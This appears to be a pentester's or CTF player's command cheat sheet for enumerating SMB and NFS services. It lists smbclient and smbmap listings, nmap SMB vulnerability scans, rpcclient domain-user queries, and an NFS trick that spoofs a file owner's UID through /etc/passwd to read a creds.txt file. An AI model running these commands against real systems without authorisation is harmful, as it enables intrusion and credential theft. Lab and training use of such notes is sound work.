$ smbmap -H $ip
$ smbmap -u <user> -H $ip
$ smbclient -L $ip
$ smbclient -N -L //10.10.10.4
$ ls -l /usr/share/nmap/scripts/smb*
$ nmap -p 139,445 --script smb-vul* $ip
$ nmap -A 10.10.10.4
$ nmap -p 139,445 $ip --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery
$ mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//ip/My Share" /mnt/cifs
$ mount -o nolock $ip:/home ~/home/
-rwx------ 1 1014 1014 48 Jun 10 09:16 creds.txt
$ sudo adduser pwn
$ sudo sed -i -e 's/1001/1014/g' /etc/passwd
$ su pwn
$ cat creds.txt
$ smbclient //ip/tmp
$ smbclient \\\\ip\\ipc$ -U john
$ smbclient //ip/ipc$ -U john
$ srvinfo
$ enumdomusers
$ getdompwinfo
$ querydominfo
$ netshareenum
$ netshareenumall